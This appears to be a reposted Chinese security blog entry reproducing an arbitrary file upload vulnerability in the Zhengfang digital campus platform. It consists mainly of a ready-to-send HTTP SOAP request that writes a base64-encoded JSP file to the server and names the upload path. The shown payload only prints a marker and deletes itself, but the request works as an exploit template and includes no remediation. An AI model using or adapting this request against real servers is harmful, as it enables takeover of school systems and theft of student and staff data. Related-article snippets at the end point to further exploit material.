首页 > 其他分享 >[漏洞复现]正方数字化校园平台存在任意文件上传漏洞

[漏洞复现]正方数字化校园平台存在任意文件上传漏洞

时间:2024-07-14 18:29:02浏览次数:15  
标签:xml 管理 image 漏洞 正方 Sec 复现 Ua Fetch

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

漏洞简介

正方数字化校园平台 是以学校现有网络为基础,以服务于全校师生的教学、科研、生活为目的,建立在学校数据中心之上,涵盖了学校的信息化标准管理、学校管理、学生管理、教学管理、教职工管理、科研管理、财务管理、资产与设备管理、行政办公管理、数字图书资料管理等全方位的管理信息平台与信息服务平台。数字化校园信息平台解决方案的重点是解决学校信息化建设过程中不同厂家、不同产品、不同运行环境、不同开发工具开发的应用系统的集成。攻击者可通过上传恶意文件,获取服务器权限。

漏洞复现

下面文件内容需要base64编码

POST /zfca/axis/RzptManage HTTP/1.1
Host: 
Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Soapaction: 
Content-Type: text/xml;charset=UTF-8
Content-Length: 793

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:pub="http://pubService.webServices.zfca.zfsoft.com">
   <soapenv:Header/>
   <soapenv:Body>
      <pub:savePic soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <filepath xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">t.jsp</filepath>
         <bytes xsi:type="soapenc:base64Binary" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">PCUgb3V0LnByaW50bG4oMTIzKTtuZXcgamF2YS5pby5GaWxlKGFwcGxpY2F0aW9uLmdldFJlYWxQYXRoKHJlcXVlc3QuZ2V0U2VydmxldFBhdGgoKSkpLmRlbGV0ZSgpOyU+</bytes>
      </pub:savePic>
   </soapenv:Body>
</soapenv:Envelope>

上传路径/zfca/t.jsp

标签:xml,管理,image,漏洞,正方,Sec,复现,Ua,Fetch
From: https://blog.csdn.net/LiangYueSec/article/details/140374035

相关文章

  • CmsEasy7.6支付逻辑漏洞
    最近在学习支付逻辑漏洞相关的知识,利用一些测试思路来复现一下靶场,顺便做一下笔记,不过这个靶场比较老了,供新手学习练练手靶场源码下载链接:https://ftp.cmseasy.cn/CmsEasy7.x/CmsEasy_7.6.3.2_UTF-8_20200422.zip靶场部署自行百度,用我大学老师的一句话————要学会面向百度,要......
  • 提升漏洞挖掘效率:详解RustScan端口快速扫描工具
    在漏洞挖掘过程中,梳理目标站点的资产面是至关重要的一步。这一过程通常需要进行全量端口扫描,以发现目标站点上所有可能的开放端口。然而,传统的端口扫描工具往往需要大量时间来完成这一任务,特别是在面对大量端口时。这不仅延长了整个漏洞挖掘的时间,还可能导致关键漏洞的发现......
  • Nexpose v6.6.260 for Linux & Windows - 漏洞扫描
    Nexposev6.6.260forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,releaseJul10,2024请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......
  • 改进的多目标差分进化算法在电力系统环境经济调度中的应用(Python代码实现)【电气期刊论
     目录 1电力系统环境经济调度数学模型电力系统环境经济调度问题概述多目标差分进化算法的应用应用研究的意义2  改进的多目标差分进化算法3Python代码实现3.1结果3.2Python代码 4完整Python代码、数据下载   改进的多目标差分进化算法不仅可以应用......
  • 网络安全——挖掘漏洞(中间件漏洞)
    什么是漏洞挖掘?学习网络安全的同学肯定了解过漏洞挖掘,漏洞挖掘通常指的是在软件、系统、网络或任何其他类型的技术系统中寻找安全漏洞的过程。这些漏洞可能允许未经授权的访问、数据泄露、服务中断或其他形式的安全威胁。漏洞挖掘是一个网络安全专业领域。作为初学者,学习......
  • [武器化学习] 鲸发卡系统虚拟卡系统任意文件读取漏洞poc
    !/usr/bin/envpython3importrequestsfromtermcolorimportcoloredfromtqdmimporttqdmfromconcurrent.futuresimportThreadPoolExecutor,as_completed,CancelledErrorimportosimportsignalimportsysprint('''本程序仅用于交流学习使用,任何未经授权的渗透......
  • SRC漏洞挖掘--CNVD国家信息安全漏洞共享平台
    目录0x00简介0x01过程中使用的工具0x02详细过程一、寻找挖洞目标1.1工具介绍1.2目标检索过程二、趁手的挖洞工具2.1工具介绍2.2工具下载链接2.3工具使用三、挖洞时间四、漏洞验证五、提交漏洞0x03注意事项0x00简介SRC漏洞平台:安全应急响应中心......
  • PowerCreatorCMS UploadResourcePic 任意文件上传漏洞复现
    严正声明1.本文仅用于技术交流,目的是向相关安全人员展示漏洞的存在和利用方式,以便更好地提高网络安全意识和技术水平。2.任何人不得利用本文中的技术手段进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。3.本文中提到的漏洞验证poc仅用于授权......
  • Shiro550反序列化漏洞分析
    shiro搭建教程可以在网上自行搜索漏洞发现进入shiro界面后,burp抓包,选择rememberme并进行登录。观察burp抓到的包登录之后服务器返回一个CookieRememberme之后用户的访问都带着这个Cookie这个Cookie很长,可能会在里面存在一定的信息源码审计接下来去shiro源码中,看......
  • SQL Server 2022 RTM DGR (CU13+GDR) 发布,修复高危安全漏洞
    SQLServer2022RTMDGR(CU13+GDR)发布,修复高危安全漏洞SQLServerNativeClientOLEDB提供程序远程代码执行漏洞CVE-2024-35272修复请访问原文链接:https://sysin.org/blog/sql-server-2022/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgSQLServer2022......